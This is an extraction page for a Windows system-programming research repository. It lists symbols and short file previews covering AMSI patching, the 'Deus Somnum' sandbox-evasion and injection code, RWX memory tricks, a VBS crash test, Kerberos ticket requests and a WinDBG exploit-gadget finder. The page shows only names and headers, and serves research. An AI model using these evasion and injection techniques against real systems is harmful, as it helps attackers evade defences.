type PEB_LDR_DATA (line 44) | typedef struct _PEB_LDR_DATA {
type PEB (line 53) | typedef struct _PEB {
function wmain (line 124) | int wmain(int argc, wchar_t* argv[], wchar_t* envp[]) {
function BOOL (line 239) | BOOL PlLoadLibrary(LPCWSTR szDllName) {
FILE: Power Management/deus_somnum_pic.c
type INITIAL_TEB (line 4) | typedef struct _INITIAL_TEB {
type CLIENT_ID (line 12) | typedef struct __CLIENT_ID {
type PEB_LDR_DATA (line 17) | typedef struct _PEB_LDR_DATA {
type PVOID (line 26) | typedef PVOID PACTIVATION_CONTEXT;
type RTL_ACTIVATION_CONTEXT_STACK_FRAME (line 28) | typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME {
type ACTIVATION_CONTEXT_STACK (line 34) | typedef struct _ACTIVATION_CONTEXT_STACK {
type LSA_UNICODE_STRING (line 42) | typedef struct _LSA_UNICODE_STRING {
type OBJECT_ATTRIBUTES (line 48) | typedef struct _OBJECT_ATTRIBUTES {
type LDR_MODULE (line 57) | typedef struct _LDR_MODULE {
type GDI_TEB_BATCH (line 73) | typedef struct _GDI_TEB_BATCH {
type TEB_ACTIVE_FRAME_CONTEXT (line 79) | typedef struct _TEB_ACTIVE_FRAME_CONTEXT {
type TEB_ACTIVE_FRAME (line 84) | typedef struct _TEB_ACTIVE_FRAME {
type PEB (line 90) | typedef struct _PEB {
type TEB (line 147) | typedef struct _TEB {
type ULONG (line 306) | typedef ULONG CALLBACK DEVICE_NOTIFY_CALLBACK_ROUTINE(
type DEVICE_NOTIFY_CALLBACK_ROUTINE (line 311) | typedef DEVICE_NOTIFY_CALLBACK_ROUTINE* PDEVICE_NOTIFY_CALLBACK_ROUTINE;
type DEVICE_NOTIFY_SUBSCRIBE_PARAMETERS (line 313) | typedef struct _DEVICE_NOTIFY_SUBSCRIBE_PARAMETERS {
type CONST (line 341) | typedef VOID(NTAPI* RtlMoveMemoryDelegate) (PVOID, CONST PVOID, SIZE_T);
type PVOID (line 342) | typedef NTSTATUS(NTAPI* NtAllocateVirtualMemoryDelegate) (HANDLE, PVOID*...
type PVOID (line 343) | typedef NTSTATUS(NTAPI* NtProtectVirtualMemoryDelegate) (HANDLE, PVOID*,...
type ACCESS_MASK (line 344) | typedef NTSTATUS(NTAPI* NtCreateThreadExDelegate) (PHANDLE, ACCESS_MASK,...
type BOOLEAN (line 345) | typedef NTSTATUS(NTAPI* NtWaitForSingleObjectDelegate) (HANDLE, BOOLEAN,...
type ULONG (line 348) | typedef NTSTATUS(NTAPI* LdrLoadDllDelegate) (PWCHAR, ULONG, PUNICODE_STR...
type DWORD (line 355) | typedef DWORD(WINAPI* PowerSettingRegisterNotificationDelegate) (LPCGUID...
type VxApiTable (line 358) | typedef struct _VxApiTable {
function wmain (line 388) | int wmain() {
function ULONG (line 451) | ULONG CALLBACK HandlePowerNotifications(PVOID Context, ULONG Type, PVOID...
function VOID (line 480) | VOID Inject(VOID) {
function DWORD64 (line 521) | DWORD64 VxGetFunctionAddress(DWORD64 dwModuleBase, DWORD64 dwHash) {
function VOID (line 550) | VOID VxZeroMemory(PVOID Destination, SIZE_T Size) {
function DWORD (line 563) | DWORD djb2(PBYTE str) {
function PTEB (line 573) | PTEB RtlGetTeb() {
FILE: Power Management/deus_somnum_user32.cpp
function ATOM (line 54) | ATOM Win64RegisterCallBackNotifications(VOID) {
function VOID (line 134) | VOID Cleanup(VOID) {
FILE: Process/GetProcessEnvironmentBlock/GetProcessEnvironmentBlock/Program.cs
class Program (line 5) | public sealed class Program {
method Main (line 6) | static void Main(string[] args) {
method VirtualProtect (line 60) | [DllImport("kernel32.dll")]
type UNICODE_STRING (line 72) | [StructLayout(LayoutKind.Sequential, Pack = 0)]
type LIST_ENTRY (line 79) | [StructLayout(LayoutKind.Sequential, Pack = 0)]
type PEB (line 85) | [StructLayout(LayoutKind.Sequential, Pack = 1)]
FILE: RWX/JITCompilation/JITCompilation/Program.cs
class Program (line 9) | internal sealed class Program {
method Main (line 26) | static void Main(string[] args) {
method Stub (line 72) | private static IntPtr Stub() {
class Util (line 77) | internal sealed class Util {
method IsByteCallProcedure (line 83) | public static bool IsByteCallProcedure(IntPtr pointer) {
method IsByteJmpProcedure (line 102) | public static bool IsByteJmpProcedure(IntPtr pointer) {
type UNICODE_STRING (line 118) | [StructLayout(LayoutKind.Sequential, Pack = 1)]
type LIST_ENTRY (line 125) | [StructLayout(LayoutKind.Sequential, Pack = 1)]
type PEB (line 131) | [StructLayout(LayoutKind.Sequential, Pack = 1)]
FILE: RWX/MMF/MMF/Program.cs
class Program (line 7) | internal sealed class Program {
method Main (line 24) | static void Main(string[] args) {
type UNICODE_STRING (line 56) | [StructLayout(LayoutKind.Sequential, Pack = 1)]
type LIST_ENTRY (line 63) | [StructLayout(LayoutKind.Sequential, Pack = 1)]
type PEB (line 69) | [StructLayout(LayoutKind.Sequential, Pack = 1)]
FILE: RWX/PInvoke/PInvoke/Program.cs
class Program (line 6) | internal sealed class Program {
method VirtualAlloc (line 52) | [DllImport("kernel32.dll")]
method VirtualProtect (line 68) | [DllImport("kernel32.dll")]
method Main (line 80) | static void Main(string[] args) {
type UNICODE_STRING (line 109) | [StructLayout(LayoutKind.Sequential, Pack = 1)]
type LIST_ENTRY (line 116) | [StructLayout(LayoutKind.Sequential, Pack = 1)]
type PEB (line 122) | [StructLayout(LayoutKind.Sequential, Pack = 1)]
FILE: Secure Enclave/VBS/bsod.c
function main (line 12) | int main() {
FILE: Task Scheduler/enumerate_tasks.cpp
function VOID (line 7) | VOID wprintf_indent(LPCWSTR string, DWORD indent, BOOL bIsTaskName) {
function BOOL (line 21) | BOOL IsAdministrator() {
function BOOL (line 41) | BOOL InitialiseCOM() {
function BOOL (line 59) | BOOL CreateTaskServiceInstance(ITaskService*& pTaskService) {
function BOOL (line 69) | BOOL ConnectToTaskService(ITaskService*& pTaskService) {
function BOOL (line 92) | BOOL GetRootTaskFolder(ITaskFolder*& pTaskFolder, ITaskService*& pTaskSe...
function BOOL (line 102) | BOOL EnumerateTasks(ITaskFolder*& pTaskFolder, DWORD indent) {
function INT (line 159) | INT wmain() {
FILE: WinDBG/exploit86.js
function initializeScript (line 3) | function initializeScript() {
function FindPPR (line 7) | function FindPPR(beginning, end) {
function _FindPPRInternal (line 42) | function _FindPPRInternal(byte) {
function GetModulesCharacteristics (line 61) | function GetModulesCharacteristics(IncludeSystem32) {
Condensed preview — 94 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (1,757K chars).
[
{
"path": ".gitignore",
"chars": 6147,
"preview": "## Ignore Visual Studio temporary files, build results, and\n## files generated by popular Visual Studio add-ons.\n##\n## G"
},
{
"path": "AMSI/amsi_module_patch.c",
"chars": 19143,
"preview": "/*+===================================================================\n File: amsi_module_patch.c\n Summary: Dis"
},
{
"path": "AMSI/amsi_scanner.c",
"chars": 7383,
"preview": "/*+===================================================================\n File: amsi_scanner.c\n Summary: Scan str"
},
{
"path": "AMSI/structs.h",
"chars": 10254,
"preview": "#pragma once\n#include <Windows.h>\n\n/*--------------------------------------------------------------------\n Windows stru"
},
{
"path": "AppLocker/List Policies/interfaces.h",
"chars": 5120,
"preview": "/**\n* @file interfaces.h\n* @date 02-08-2020\n* @author Paul Laîné (@am0nsec)\n* @version 1.0\n* @brief Enumer"
},
{
"path": "AppLocker/List Policies/main.c",
"chars": 4044,
"preview": "/**\n* @file main.c\n* @date 02-08-2020\n* @author Paul Laîné (@am0nsec)\n* @version 1.0\n* @brief Enumerate Ap"
},
{
"path": "CMakeLists.txt",
"chars": 715,
"preview": "# @file CMakeLists.txt\n# @data 12/02/2021\n# @author Paul L. (@am0nsec)\n# @version 1.0\n# @brief "
},
{
"path": "CMakeSettings.json",
"chars": 783,
"preview": "{\n \"configurations\": [\n {\n \"name\": \"x64-Debug\",\n \"generator\": \"Ninja\",\n \"configurationType\": \"Debug\""
},
{
"path": "Cryptography/AES CNG/README.md",
"chars": 367,
"preview": "## AESCrypt ##\n\nThis repository provide a simple example of how to use the Windows Cryptography API Next Generation to e"
},
{
"path": "Cryptography/AES CNG/source/AES.cpp",
"chars": 7742,
"preview": "#pragma once\n#include <Windows.h>\n#include <bcrypt.h>\n#include <iostream>\n#include <vector>\n\n#include \"nthelpers.h\"\n#inc"
},
{
"path": "Cryptography/AES CNG/source/AES.h",
"chars": 1441,
"preview": "#pragma once\n#include <Windows.h>\n#include <bcrypt.h>\n\nnamespace CNG {\n\tstatic const BYTE rgbIV[] = {\n\t\t0x00, 0x01, 0x02"
},
{
"path": "Cryptography/AES CNG/source/AESCrypt.sln",
"chars": 1755,
"preview": "\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio Version 16\nVisualStudioVersion = 16.0.2921"
},
{
"path": "Cryptography/AES CNG/source/AESCrypt.vcxproj",
"chars": 7408,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msb"
},
{
"path": "Cryptography/AES CNG/source/AESCrypt.vcxproj.filters",
"chars": 1491,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuil"
},
{
"path": "Cryptography/AES CNG/source/Base64.h",
"chars": 1586,
"preview": "#pragma once\n#include <Windows.h>\n#include <string>\n#include <vector>\n\n#include <openssl/bio.h>\n#include <openssl/evp.h>"
},
{
"path": "Cryptography/AES CNG/source/Main.cpp",
"chars": 2602,
"preview": "#pragma once\n#ifndef WIN32_LEAN_AND_MEAN\n#define WIN32_LEAN_AND_MEAN\n#endif\n#ifndef NOCOMM\n#define NOCOMM\n#endif\n#includ"
},
{
"path": "Cryptography/AES CNG/source/Util.cpp",
"chars": 1215,
"preview": "#pragma once\n#ifndef WIN32_LEAN_AND_MEAN\n#define WIN32_LEAN_AND_MEAN\n#endif\n#ifndef NOCOMM\n#define NOCOMM\n#endif\n#includ"
},
{
"path": "Cryptography/AES CNG/source/Util.h",
"chars": 602,
"preview": "#pragma once\n#ifndef WIN32_LEAN_AND_MEAN\n#define WIN32_LEAN_AND_MEAN\n#endif\n#ifndef NOCOMM\n#define NOCOMM\n#endif\n#includ"
},
{
"path": "Cryptography/AES CNG/source/nthelpers.h",
"chars": 159,
"preview": "#pragma once\n#define NT_SUCCESS(Status)\t\t\t\t(((NTSTATUS)(Status)) >= 0)\n#define STATUS_UNSUCCESSFUL\t\t\t\t0xC0000001\n#define"
},
{
"path": "DIA/CMakeLists.txt",
"chars": 1110,
"preview": "# @file CMakeLists.txt\n# @data 13/06/2022\n# @author Paul L. (@am0nsec)\n# @version 1.0\n# @brief "
},
{
"path": "DIA/inc/callback.h",
"chars": 1335,
"preview": "/*+================================================================================================\nModule Name: callbac"
},
{
"path": "DIA/inc/dirutil.h",
"chars": 913,
"preview": "/*+================================================================================================\nModule Name: dirutil"
},
{
"path": "DIA/inc/interface.h",
"chars": 2123,
"preview": "/*+================================================================================================\nModule Name: interfa"
},
{
"path": "DIA/inc/msdia/idl/dia2.idl",
"chars": 69161,
"preview": "// dia2.idl - Debug Information Access (DIA) interface description\n//---------------------------------------------------"
},
{
"path": "DIA/inc/msdia/include/cvconst.h",
"chars": 119554,
"preview": "// cvconst.h - codeview constant definitions\n//-----------------------------------------------------------------\n//\n// C"
},
{
"path": "DIA/inc/msdia/include/dia2.h",
"chars": 1084088,
"preview": "\n\n/* this ALWAYS GENERATED file contains the definitions for the interfaces */\n\n\n /* File created by MIDL compiler versi"
},
{
"path": "DIA/inc/msdia/include/diacreate.h",
"chars": 1199,
"preview": "// diacreate.h - creation helper functions for DIA initialization\n//----------------------------------------------------"
},
{
"path": "DIA/src/callback.c",
"chars": 6052,
"preview": "/*+================================================================================================\nModule Name: callbac"
},
{
"path": "DIA/src/dirutil.c",
"chars": 4522,
"preview": "/*+================================================================================================\nModule Name: dirutil"
},
{
"path": "DIA/src/interface.c",
"chars": 6908,
"preview": "/*+================================================================================================\nModule Name: interfa"
},
{
"path": "DIA/src/main.c",
"chars": 4229,
"preview": "/*+================================================================================================\nModule Name: main.c\n"
},
{
"path": "Defender/ExclusionLists/CMakeLists.txt",
"chars": 382,
"preview": "# @file CMakeLists.txt\n# @author Paul L. (@am0nsec)\n# @version 1.0\n# @brief List Windows Defender "
},
{
"path": "Defender/ExclusionLists/inc/defender.h",
"chars": 2115,
"preview": "/**\n* @file\t\t\tdefender.h\n* @author\t\tPaul L. (@am0nsec)\n* @version\t\t1.0\n* @brief Windows Defender Exclusion List h"
},
{
"path": "Defender/ExclusionLists/main.c",
"chars": 1670,
"preview": "/**\n* @file\t\t\tmain.c\n* @author\t\tPaul L. (@am0nsec)\n* @version\t\t1.0\n* @brief List Windows Defender exclusions.\n* @"
},
{
"path": "Defender/ExclusionLists/src/defender.c",
"chars": 6862,
"preview": "/**\n* @file\t\t\tdefender.c\n* @author\t\tPaul L. (@am0nsec)\n* @version\t\t1.0\n* @brief Windows Defender exclusion list s"
},
{
"path": "Fusion/FindAssembly/FindAssembly.csproj",
"chars": 2723,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"15.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "Fusion/FindAssembly/FindAssembly.sln",
"chars": 1101,
"preview": "\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio Version 16\nVisualStudioVersion = 16.0.3012"
},
{
"path": "Fusion/FindAssembly/Fusion/GACUtil.cs",
"chars": 10068,
"preview": "using System;\nusing System.Text;\nusing FindAssembly.Win32;\nusing System.Runtime.InteropServices;\n\nnamespace FindAssembl"
},
{
"path": "Fusion/FindAssembly/Fusion/IAssemblyCache.cs",
"chars": 5009,
"preview": "using System;\nusing System.Runtime.InteropServices;\n\nnamespace FindAssembly.Fusion {\n\n /// <summary>\n /// Represe"
},
{
"path": "Fusion/FindAssembly/Fusion/IAssemblyCacheItem.cs",
"chars": 1982,
"preview": "using System;\nusing System.Text;\nusing System.Runtime.InteropServices;\nusing System.Runtime.InteropServices.ComTypes;\n\n"
},
{
"path": "Fusion/FindAssembly/Fusion/IAssemblyEnum.cs",
"chars": 1497,
"preview": "using System;\nusing System.Runtime.InteropServices;\n\nnamespace FindAssembly.Fusion {\n\n /// <summary>\n /// Represe"
},
{
"path": "Fusion/FindAssembly/Fusion/IAssemblyName.cs",
"chars": 5007,
"preview": "using System;\nusing System.Text;\nusing System.Runtime.InteropServices;\n\nnamespace FindAssembly.Fusion {\n\n /// <summa"
},
{
"path": "Fusion/FindAssembly/Program.cs",
"chars": 2022,
"preview": "using System;\nusing System.Reflection;\nusing FindAssembly.Fusion;\n\nnamespace FindAssembly {\n internal sealed class P"
},
{
"path": "Fusion/FindAssembly/Properties/AssemblyInfo.cs",
"chars": 1396,
"preview": "using System.Reflection;\nusing System.Runtime.CompilerServices;\nusing System.Runtime.InteropServices;\n\n// General Infor"
},
{
"path": "Fusion/FindAssembly/Win32/Functions.cs",
"chars": 686,
"preview": "using System;\nusing FindAssembly.Fusion;\nusing System.Runtime.InteropServices;\n\nnamespace FindAssembly.Win32 {\n inte"
},
{
"path": "Fusion/FindAssembly/Win32/Macros.cs",
"chars": 232,
"preview": "\nnamespace FindAssembly.Win32 {\n public static class Macros {\n\n public static bool SUCCEEDED(uint hr) => hr >"
},
{
"path": "Fusion/FindAssembly/app.config",
"chars": 158,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<configuration>\n<startup><supportedRuntime version=\"v4.0\" sku=\".NETFramework,Vers"
},
{
"path": "Fusion/ListAssemblies/gacutil.h",
"chars": 2746,
"preview": "/**\n* @file gacutil.h\n* @data 06-09-2020\n* @author Paul Laîné (@am0nsec)\n* @version 1.0\n* @br"
},
{
"path": "Fusion/ListAssemblies/main.c",
"chars": 7957,
"preview": "/**\n* @file main.c\n* @data 06-09-2020\n* @author Paul Laîné (@am0nsec)\n* @version 1.0\n* @brief"
},
{
"path": "Kerberos/AskTGT/CMakeLists.txt",
"chars": 474,
"preview": "# @file CMakeLists.txt\n# @author Paul L. (@am0nsec)\n# @version 1.0\n# @brief Kerberos request kerbe"
},
{
"path": "Kerberos/AskTGT/kerberos.c",
"chars": 30313,
"preview": "\n#include <Windows.h>\n#include <strsafe.h>\n#include \"kerberos.h\"\n\n/// <summary>\n/// Format system time in \"%ld%02ld%02ld"
},
{
"path": "Kerberos/AskTGT/kerberos.h",
"chars": 14098,
"preview": "\n#ifndef __TGT_H_GUARD__\n#define __TGT_H_GUARD__\n\n#include <Windows.h>\n\n#define STATUS_SUCCESS 0x00000000\n#de"
},
{
"path": "Kerberos/AskTGT/main.c",
"chars": 4354,
"preview": "\n#include \"socket.h\"\n\n//#include <Windows.h>\n#include <stdio.h>\n#include <Lm.h>\n#include <DsGetDC.h>\n#include <ntsecapi."
},
{
"path": "Kerberos/AskTGT/socket.c",
"chars": 1985,
"preview": "\n#include \"socket.h\"\n\n/// <summary>\n/// Initialise WinSOCK 2\n/// </summary>\nNTSTATUS SockpInitialise() {\n\tWSADATA WSADat"
},
{
"path": "Kerberos/AskTGT/socket.h",
"chars": 860,
"preview": "\n#ifndef __SOCKET_H_GUARD__\n#define __SOCKET_H_GUARD__\n\n#define _WINSOCK_DEPRECATED_NO_WARNINGS\n#include <WinSock2.h>\n#i"
},
{
"path": "Kerberos/GetTicket/CMakeLists.txt",
"chars": 411,
"preview": "# @file CMakeLists.txt\n# @author Paul L. (@am0nsec)\n# @version 1.0\n# @brief Kerberos get user TGT."
},
{
"path": "Kerberos/GetTicket/src/main.c",
"chars": 12161,
"preview": "\n#include <Windows.h>\n#include <stdio.h>\n#include <ntsecapi.h>\n#include <wincrypt.h>\n\n#pragma comment(lib, \"ntdll.lib\")\n"
},
{
"path": "Kerberos/List/CMakeLists.txt",
"chars": 413,
"preview": "# @file CMakeLists.txt\n# @author Paul L. (@am0nsec)\n# @version 1.0\n# @brief Kerberos list tickets."
},
{
"path": "Kerberos/List/src/main.c",
"chars": 18326,
"preview": "#include <Windows.h>\n#include <stdio.h>\n#include <ntsecapi.h>\n\n#pragma comment(lib, \"ntdll.lib\")\n#pragma comment(lib, \""
},
{
"path": "Kerberos/Purge/CMakeLists.txt",
"chars": 416,
"preview": "# @file CMakeLists.txt\n# @author Paul L. (@am0nsec)\n# @version 1.0\n# @brief Kerberos purge tickets"
},
{
"path": "Kerberos/Purge/src/main.c",
"chars": 2876,
"preview": "\n#include <Windows.h>\n#include <stdio.h>\n#include <ntsecapi.h>\n\n#pragma comment(lib, \"ntdll.lib\")\n#pragma comment(lib, \""
},
{
"path": "LICENSE",
"chars": 35149,
"preview": " GNU GENERAL PUBLIC LICENSE\n Version 3, 29 June 2007\n\n Copyright (C) 2007 Free "
},
{
"path": "Object Manager/List Handles/main.c",
"chars": 12211,
"preview": "/*+===================================================================\n File: main.c\n Summary: List handles fro"
},
{
"path": "Object Manager/List Handles/ntstructs.h",
"chars": 1827,
"preview": "#pragma once\n#include <Windows.h>\n\n/*--------------------------------------------------------------------\n Macros.\n----"
},
{
"path": "Object Manager/List Objects/main.c",
"chars": 8970,
"preview": "/*+===================================================================\n File: main.c\n Summary: List named objec"
},
{
"path": "Object Manager/List Objects/ntstructs.h",
"chars": 1998,
"preview": "#pragma once\n#include <Windows.h>\n\n/*--------------------------------------------------------------------\n Macros.\n----"
},
{
"path": "Office/Outlook/CMakeLists.txt",
"chars": 414,
"preview": "# @file CMakeLists.txt\r\n# @data 10/03/2021\r\n# @author Paul L. (@am0nsec)\r\n# @version 1.0\r\n# @brie"
},
{
"path": "Office/Outlook/inc/outlook.h",
"chars": 5517,
"preview": "/**\n* @file outlook.h\n* @data 10/03/2021\n* @author Paul L. (@am0nsec)\n* @version 1.0\n* @brief "
},
{
"path": "Office/Outlook/src/main.c",
"chars": 1408,
"preview": "/**\n* @file main.c\n* @data 10/03/2021\n* @author Paul L. (@am0nsec)\n* @version 1.0\n* @brief "
},
{
"path": "Office/Outlook/src/outlook.c",
"chars": 9056,
"preview": "/**\n* @file outlook.c\n* @data 10/03/2021\n* @author Paul L. (@am0nsec)\n* @version 1.0\n* @brief "
},
{
"path": "Portable Executable/parse_header.c",
"chars": 10564,
"preview": "/*+===================================================================\n File: parse_header.c\n\n Summary: Parse i"
},
{
"path": "Power Management/README.md",
"chars": 175,
"preview": "# Deus Somnum \nSource code for the Deus Somnum armouring technique against sandboxs.\n\nFurther information can be found h"
},
{
"path": "Power Management/deus_somnum_pic.c",
"chars": 20346,
"preview": "#pragma once\n#include <windows.h>\n\ntypedef struct _INITIAL_TEB {\n\tPVOID StackBase;\n\tPVOID "
},
{
"path": "Power Management/deus_somnum_user32.cpp",
"chars": 4954,
"preview": "#pragma once\n#include <Windows.h>\n\n// Global variables\nPPOWERBROADCAST_SETTING pPowerSettings;\nHPOWERNOTIFY hPowerNorifi"
},
{
"path": "Process/GetProcessEnvironmentBlock/GetProcessEnvironmentBlock/GetProcessEnvironmentBlock.csproj",
"chars": 327,
"preview": "<Project Sdk=\"Microsoft.NET.Sdk\">\r\n\r\n <PropertyGroup>\r\n <OutputType>Exe</OutputType>\r\n <TargetFramework>netcoreap"
},
{
"path": "Process/GetProcessEnvironmentBlock/GetProcessEnvironmentBlock/Program.cs",
"chars": 7991,
"preview": "using System;\r\nusing System.Runtime.InteropServices;\r\n\r\nnamespace GetProcessEnvironmentBlock {\r\n public sealed class"
},
{
"path": "Process/GetProcessEnvironmentBlock/GetProcessEnvironmentBlock.sln",
"chars": 1182,
"preview": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 16\r\nVisualStudioVersion = 16.0.3"
},
{
"path": "README.md",
"chars": 46,
"preview": "## Windows System Programming Experiments ##\n\n"
},
{
"path": "RWX/JITCompilation/JITCompilation/JITCompilation.csproj",
"chars": 171,
"preview": "<Project Sdk=\"Microsoft.NET.Sdk\">\r\n\r\n <PropertyGroup>\r\n <OutputType>Exe</OutputType>\r\n <TargetFramework>net5.0</T"
},
{
"path": "RWX/JITCompilation/JITCompilation/Program.cs",
"chars": 9978,
"preview": "using System;\r\nusing System.Reflection;\r\nusing System.Diagnostics;\r\nusing System.Runtime.CompilerServices;\r\nusing Syste"
},
{
"path": "RWX/JITCompilation/JITCompilation.sln",
"chars": 1145,
"preview": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 16\r\nVisualStudioVersion = 16.0.3"
},
{
"path": "RWX/MMF/MMF/MMF.csproj",
"chars": 321,
"preview": "<Project Sdk=\"Microsoft.NET.Sdk\">\r\n\r\n <PropertyGroup>\r\n <OutputType>Exe</OutputType>\r\n <TargetFramework>net5.0</T"
},
{
"path": "RWX/MMF/MMF/Program.cs",
"chars": 7619,
"preview": "using System;\r\nusing System.Diagnostics;\r\nusing System.IO.MemoryMappedFiles;\r\nusing System.Runtime.InteropServices;\r\n\r\n"
},
{
"path": "RWX/MMF/MMF.sln",
"chars": 1112,
"preview": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 16\r\nVisualStudioVersion = 16.0.3"
},
{
"path": "RWX/PInvoke/PInvoke/PInvoke.csproj",
"chars": 171,
"preview": "<Project Sdk=\"Microsoft.NET.Sdk\">\r\n\r\n <PropertyGroup>\r\n <OutputType>Exe</OutputType>\r\n <TargetFramework>net5.0</T"
},
{
"path": "RWX/PInvoke/PInvoke/Program.cs",
"chars": 10828,
"preview": "using System;\r\nusing System.Diagnostics;\r\nusing System.Runtime.InteropServices;\r\n\r\nnamespace PInvoke {\r\n internal se"
},
{
"path": "RWX/PInvoke/PInvoke.sln",
"chars": 1124,
"preview": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 16\r\nVisualStudioVersion = 16.0.3"
},
{
"path": "RWX/README.md",
"chars": 499,
"preview": "## Read (R), Writable (W), Executable (X) ##\n\nCollection of .NET Core C# code to generate Read, Writable and Executable "
},
{
"path": "Secure Enclave/VBS/bsod.c",
"chars": 1353,
"preview": "/**\n* @file bsod.c\n* @date 20-05-2021\n* @author Paul L. (@am0nsec)\n* @version 1.0\n* @brief "
},
{
"path": "Task Scheduler/README.md",
"chars": 72,
"preview": "Resource: https://docs.microsoft.com/en-us/windows/win32/api/_taskschd/\n"
},
{
"path": "Task Scheduler/enumerate_tasks.cpp",
"chars": 5102,
"preview": "#pragma once\n#include <Windows.h>\n#include <comdef.h>\n#include <taskschd.h>\n#pragma comment(lib, \"taskschd.lib\")\n\nVOID w"
},
{
"path": "WinDBG/exploit86.js",
"chars": 2550,
"preview": "\"use strict\";\n\nfunction initializeScript() {\n return [new host.apiVersionSupport(1, 7)];\n}\n\nfunction FindPPR(beginnin"
}
]
// ... and 2 more files (download for full content)
About this extraction
This page contains the full source code of the am0nsec/wspe GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 94 files (1.6 MB), approximately 472.1k tokens, and a symbol index with 524 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.